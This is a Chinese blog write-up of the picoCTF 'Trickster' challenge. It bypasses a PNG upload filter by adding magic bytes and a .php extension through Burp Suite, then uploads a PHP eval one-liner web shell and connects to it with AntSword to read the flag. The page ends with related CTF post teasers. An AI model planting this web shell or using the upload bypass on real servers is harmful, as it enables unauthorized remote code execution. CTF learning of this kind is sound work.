picoCTF-Web Exploitation-Trickster

已于 2024-05-12 15:06:37 修改
阅读量442 收藏 8
点赞数 8
分类专栏: CTF 文章标签: php 网络安全 web安全
于 2024-05-12 15:06:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/huckers/article/details/138755420
版权

Description

I found a web app that can help process images: PNG images only!

这应该是个上传漏洞了,十几年没用过了,不知道思路是不是一样的,以前的思路是通过上传漏洞想办法上传一个木马,拿到webshell,今天试试看能不能成功。
随便翻一翻源码没有找到什么有用的信息,只找到一个robots.txt(这还是最近才学到的给Google提供的map文件)
robots.txt发现如下信息

User-agent: *
Disallow: /instructions.txt
Disallow: /uploads/

有一个/uploads/文件夹这里应该就是文件上传后的地址了

/instructions.txt文件信息如下,大意是提交时验证.png 扩展名,然后还要验证文件字节的正确性

Let's create a web app for PNG Images processing.
It needs to:
Allow users to upload PNG images
look for ".png" extension in the submitted files
make sure the magic bytes match (not sure what this is exactly but wikipedia says that the first few bytes contain 'PNG' in hexadecimal: "50 4E 47" )
after validation, store the uploaded files so that the admin can retrieve them later and do the necessary processing.

那我i们就试一试,上传一个非png文件提示需要.png后缀,把非png文件后缀改为.png发现后端也有有文件头验证,可能这就是/instructions.txt 所说

随便制作一个png图片(直接截图保存),越小越好,便于我们查看修改文件信息,上传png图片
使用Burpsuite抓包,查看请求信息Content-Type: image/png 这应该就是后端的验证关键了吧
修改png文件信息,加上PHP一句话木马,修改一下filename后缀加上.php,(这里后缀的验证是前端js做的,用Burpsuite发送请求就不必考虑后缀的验证问题了)
如图返回上传成功

<?php @eval($_POST['hucker']);?>

在这里插入图片描述
接下来我们使用中国蚁剑连接木马地址,以前用菜刀,管理webshell,爬取网站文件信息挺好用的,百度找到一个中国蚁剑就决定试试,看介绍好像也是根据菜刀改的。这种黑客软件最好是去github下载原版,可以验证MD5,毕竟是开源的东西,一般不会存在后门。

连接我们的木马,前面我们通过robots.txt看到文件上传目录是uploads,组合一下得到地址[http://atlas.picoctf.net:49226/uploads/2.png.php],输入密码hucker 连接

直接查看网站文件,找到一个GAZWIMLEGU2DQ.txt 里面就是flag了
在这里插入图片描述
在这里插入图片描述

huckers
关注
  • 8
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
android-kernel-exploitation:Android内核开发
03-19
Android内核开发 客观的 本次研讨会的目的是开始在Android平台上进行内核...git clone https://github.com/cloudfuzz/android-kernel-exploitation ~ /workshop Github页面URL 车间流 作者 阿什法克安萨里( 的) 。
vmware-exploitation:与VMware转义漏洞相关的链接的集合
05-12
VMware开发与VMware转义漏洞相关的链接的集合。 拉请求是受欢迎的。研究2020年 [文章] [幻灯片] [文章] 撰写的 [文章]2019年“ ESXi的大逃亡”(36C3)[] [ ] 撰写的 [文章] 撰写的 [文章] [纸] 2018年Zisis ...
picoCTF-Web Exploitation-Most Cookies
huckers的博客
05-11 357
该网站上要指出的另一件事是有一个“验签”部分。由于Flask Cookie 涉及加密,因此设置了一个。将得到签名后的token替换到网页cookie→session中,刷新页面得到flag。使用flask-unsign及cookie_names转换的wordlist解签找到。安装flask-unsign(我是windows,cmd环境,请注意引号相关)wordlist.txt(放到cmd运行目录即可,我的是。这里的逻辑表示,本站使用Python的Flask框架。进行签名,使用我们解密出的secret。
picoCTF-Web Exploitation-More SQLi
huckers的博客
05-12 360
先随便输入个账号密码登录一下,得到查询SQL,接下来应该对SQL进行某些攻击来绕过密码登录成功。password 条件在 username 前,我们只能先搞定password了。表,用来存储数据库表的一些信息,我们构建一个sql,用来展示都有哪些表及字段。中有个flag字段,我们构建一个sql来查询,得到flag。提示使用的SQLite数据库,在 SQLite 中有个。填入信息search一下发现这里大概的sql语句为。建如下sql,试一下。
picoCTF-Web Exploitation-Web Gauntlet
huckers的博客
05-12 475
按照提示,需要用admin登录,查看filter.php,这应该是一个SQL注入题,提示我们可以使用无痕浏览器来以便cookie可以不用每次清除。中展示了sql过滤逻辑,可以回味一下,尝试用不同的关键字来注入。提示sql过滤or,我们使用。
picoCTF-Web Exploitation-Java Code Analysis!?!
huckers的博客
05-13 992
code?
PicoCTF-2019-WirteUp
Zichel77的博客
11-25 1351
1. 2Warm-General Skills 直接将十进制转化为二进制 picoCTF{101010} 2. Insp3ct0r-Web Exploitation https://2019shell1.picoctf.com/problem/63975/ 点击链接看到如下页面 点击What没有变化,点击How出现如下页面 说明是分别从HTML,CS...
CTF-Web Exploitation(持续更新)
huckers的博客
05-09 760
根据提示使用不同的请求方式得到response可能会得到结果使用抓包工具Burp Suit抓取链接请求信息修改请求方式POST/GET为HEAD发送请求,获取包含flag的响应信息TheHEADGETHEAD方法请求与GET请求相同的响应,但没有响应正文。Burp Suite是用于攻击web 应用程序的集成平台,包含了许多工具。Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。本题中使用。
ctf101-Web Exploitation
Starr
06-15 692
Web Exploitation 文章目录Web Exploitation1. SQL Injection2. Command InjectionExample Payloads3. Directory Traversal4. Cross Site Request ForgeryUsing CSRF5. Cross Site ScriptingReflected XSSStored XSSDOM ...
picoCTF,Web Exploitation,网页开发类,39/45
Allezima阿力代码
02-10 2305
记录一下自己做的CTF,最初将所有题目放在一个帖子里,帖子太长了,为了方便后期编辑和阅读。2023年02月10日,将帖子拆分……
picoCTF2019--logon
cyjmosthandsome的博客
11-14 725
1. 记录做这道题时学到的一些知识点 在username输入admin登录时,显示No flag for you,F12查看请求包,发现cookies栏显示admin=False 然后就想到用burp抓包将cookie中的admin改为True 2. 遇到的问题 利用burp直接抓包,抓到的第一个包如下 直接send包,得到的response如下 然后follow the ...
heap-exploitation.pdf
02-01
heap-exploitation.pdf
Windows-10-Exploitation
03-21
Windows-10-Exploitation
awesome-hyper-v-exploitation:Hyper-V开发资源,模糊测试和漏洞研究的精选清单
03-14
极好的Hyper-V开发 Hyper-V开发资源,模糊测试和漏洞研究的精选列表。 如果您想做出贡献,请阅读。 有关与虚拟化相关的链接的更广泛列表,请参阅。目录攻击Hyper-V-POC的JaanusKääp[2019]-美国黑帽[Joe Bialek] ...
Web】CISCN 2024初赛 题解(全)
uuzeray的博客
05-21 1156
这里注意细节,靶机发了两次请求,第一次我们就返回一个正常的图片,第二次请求就发一个302,php代码块要用html标签包裹。注意下面这段报错,因为加不了引号,开头是数字的话,就会将类型识别为数字,若后续出现了字符串就会报错。再打sqlite,指定tableName,加载写入的恶意so文件,反弹shell。最后注意要将获取的变量元组转字符串,再用逗号分隔,依次输出,从而绕过seed。考的python栈帧沙箱逃逸,获取到外部的栈帧,就可以用。因为ban了引号,考虑hex2bin,将数字转为字符串。
【全开源】沃德商协会管理系统源码(FastAdmin+ThinkPHP+Uniapp)
最新发布
u011092458的博客
05-25 381
一款基于FastAdmin+ThinkPHP+Uniapp开发的商协会系统,新一代数字化商协会运营管理系统,以“智慧化会员体系、智敏化内容运营、智能化活动构建”三大板块为基点,实施功能全场景覆盖,一站式解决商协会需求壁垒,有效快速建立自有数字化管理体系、提升组织管理效能、增强会员粘性、沟通连接市场,真正做到为构建有影响力的现代化智慧型组织赋能。数据决策支持:沃德商协会管理系统源码提供的数据统计和分析功能,为商协会提供了宝贵的决策支持,帮助商协会更好地了解市场需求和会员需求,制定更精准的发展战略。
深入解析:Element Plus 与 Vite、Nuxt、Laravel 的结合使用
一个普通人
05-23 910
Element Plus 作为一个强大的 Vue.js 组件库,可以与 Vite、Nuxt 和 Laravel 等不同的工具和框架结合使用,为开发者提供灵活、高效的开发体验。根据项目需求选择合适的工具和框架,可以极大地提升开发效率和应用性能
PHP生成二维码+二维码包含logo图片展示
颜夕_
05-20 266
前端你自己列表读uploads/admin/qrcode/‘.$aid.’.png这个就行。生成二维码包含logo图片(代码仅供参考,逻辑按照自己的写)用到的扩展自己安装(注:只生成二维码只要开gd扩展就行)
nmap --scrip
05-20
NSE scripts are used for a variety of purposes such as vulnerability detection, network inventory, and exploitation. The --script option allows users to specify which scripts they want to run. For ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值